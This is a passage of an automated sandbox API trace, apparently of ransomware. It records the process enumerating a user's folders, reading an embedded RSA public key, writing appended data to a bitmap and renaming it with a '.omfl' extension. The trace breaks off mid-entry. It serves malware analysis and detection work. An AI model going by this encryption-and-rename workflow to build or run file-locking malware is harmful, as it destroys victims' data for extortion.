RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.521] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.521] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.521] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0131.521] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0131.521] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.521] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.521] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0131.521] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0131.521] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.521] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.521] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0131.521] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.521] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.521] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.521] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0131.521] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.521] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.521] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.521] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0131.521] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.521] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.522] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.522] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0131.522] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.522] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.522] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.522] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0131.522] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.522] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.522] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.522] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0131.522] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.522] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.522] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.522] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0131.522] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.522] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.522] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.522] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0131.522] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.522] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0xdd29950 [0131.522] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.522] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0131.522] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.522] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0131.522] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.522] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.522] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.522] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0131.522] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.522] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0xdd29950 [0131.522] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.523] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0131.523] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.523] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0131.523] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0xdd29950 [0131.523] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0131.523] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.523] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0131.523] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0xdd29950 [0131.523] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0131.523] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.523] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0131.523] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.523] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.523] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.523] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0131.523] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.523] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.523] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.523] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0131.523] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.523] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0xdd29950 [0131.523] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.523] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0131.523] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.523] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0131.523] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0131.523] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.523] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.523] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0131.523] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0131.524] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.524] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.524] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0131.524] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.524] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.524] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.524] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0131.524] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.524] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.524] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.524] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0131.524] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.524] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.524] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.524] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0131.524] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\") returned="My Documents\\" [0131.524] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0131.524] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0131.524] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0131.524] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0131.524] PathFindFileNameW (pszPath="") returned="" [0131.524] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a7ce310, ftCreationTime.dwHighDateTime=0x1d5e44b, ftLastAccessTime.dwLowDateTime=0xae4f07f0, ftLastAccessTime.dwHighDateTime=0x1d5df8f, ftLastWriteTime.dwLowDateTime=0xae4f07f0, ftLastWriteTime.dwHighDateTime=0x1d5df8f, nFileSizeHigh=0x0, nFileSizeLow=0x187b6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="V8TBDteN WXk80xCqnjc.mp3", cAlternateFileName="V8TBDT~1.MP3")) returned 0xffffffff [0131.525] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.525] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750caf0 | out: hHeap=0x4970000) returned 1 [0131.525] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5cf0 | out: hHeap=0x4970000) returned 1 [0131.525] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0131.525] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0131.525] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\") returned="NetHood\\" [0131.525] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0131.525] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0131.525] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0131.525] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0131.525] PathFindFileNameW (pszPath="") returned="" [0131.525] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a7ce310, ftCreationTime.dwHighDateTime=0x1d5e44b, ftLastAccessTime.dwLowDateTime=0xae4f07f0, ftLastAccessTime.dwHighDateTime=0x1d5df8f, ftLastWriteTime.dwLowDateTime=0xae4f07f0, ftLastWriteTime.dwHighDateTime=0x1d5df8f, nFileSizeHigh=0x0, nFileSizeLow=0x187b6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="V8TBDteN WXk80xCqnjc.mp3", cAlternateFileName="V8TBDT~1.MP3")) returned 0xffffffff [0131.525] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0131.526] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750caf0 | out: hHeap=0x4970000) returned 1 [0131.526] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757ca08 | out: hHeap=0x4970000) returned 1 [0131.526] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0131.527] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0131.527] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0131.527] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0131.527] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0131.527] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0131.527] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0131.527] PathFindFileNameW (pszPath="") returned="" [0131.527] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdc5e9c20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc5e9c20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0131.527] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5cf0 | out: hHeap=0x4970000) returned 1 [0131.527] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdc5e9c20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc5e9c20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.528] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc09bb760, ftCreationTime.dwHighDateTime=0x1d5d971, ftLastAccessTime.dwLowDateTime=0x4a14adc0, ftLastAccessTime.dwHighDateTime=0x1d5e4f4, ftLastWriteTime.dwLowDateTime=0x4a14adc0, ftLastWriteTime.dwHighDateTime=0x1d5e4f4, nFileSizeHigh=0x0, nFileSizeLow=0x131d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3MX7glg1.bmp", cAlternateFileName="")) returned 1 [0131.528] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3MX7glg1.bmp") returned=".bmp" [0131.528] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3MX7glg1.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\3mx7glg1.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6e4 [0131.528] GetFileSizeEx (in: hFile=0x6e4, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=78292) returned 1 [0131.528] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.531] SetFilePointerEx (in: hFile=0x6e4, liDistanceToMove=0x131ae, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.531] ReadFile (in: hFile=0x6e4, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.532] ReadFile (in: hFile=0x6e4, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x131d4, lpOverlapped=0x0) returned 1 [0131.533] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.533] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.533] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.533] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2e68) returned 1 [0131.534] CryptCreateHash (in: hProv=0x49d2e68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.534] CryptHashData (hHash=0xdce3b30, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.534] CryptGetHashParam (in: hHash=0xdce3b30, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.534] CryptGetHashParam (in: hHash=0xdce3b30, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.534] GetLastError () returned 0x0 [0131.534] CryptDestroyHash (hHash=0xdce3b30) returned 1 [0131.534] CryptReleaseContext (hProv=0x49d2e68, dwFlags=0x0) returned 1 [0131.534] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0131.534] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.534] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.535] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.535] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0131.535] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0131.536] SetFilePointerEx (in: hFile=0x6e4, liDistanceToMove=0x131d4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.536] WriteFile (in: hFile=0x6e4, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.536] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0131.536] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5cf0 [0131.536] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x428) returned 0xdd19550 [0131.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0xdd19550, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 41 [0131.536] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x430) returned 0xdce69c8 [0131.536] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd19550 | out: hHeap=0x4970000) returned 1 [0131.536] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5cf0 | out: hHeap=0x4970000) returned 1 [0131.536] WriteFile (in: hFile=0x6e4, lpBuffer=0xdce69c8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdce69c8*, lpNumberOfBytesWritten=0xe00fb50*=0x28, lpOverlapped=0x0) returned 1 [0131.537] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0131.537] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.537] WriteFile (in: hFile=0x6e4, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.537] CloseHandle (hObject=0x6e4) returned 1 [0131.545] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0131.545] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x880) returned 0xdd29950 [0131.545] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d2e60 | out: hHeap=0x4970000) returned 1 [0131.545] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3MX7glg1.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\3mx7glg1.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3MX7glg1.bmp.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\3mx7glg1.bmp.omfl")) returned 1 [0131.546] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0131.546] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0131.546] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.547] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf9d98 | out: hHeap=0x4970000) returned 1 [0131.547] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x476f9f40, ftCreationTime.dwHighDateTime=0x1d5d8dc, ftLastAccessTime.dwLowDateTime=0x7a8cd510, ftLastAccessTime.dwHighDateTime=0x1d5e326, ftLastWriteTime.dwLowDateTime=0x7a8cd510, ftLastWriteTime.dwHighDateTime=0x1d5e326, nFileSizeHigh=0x0, 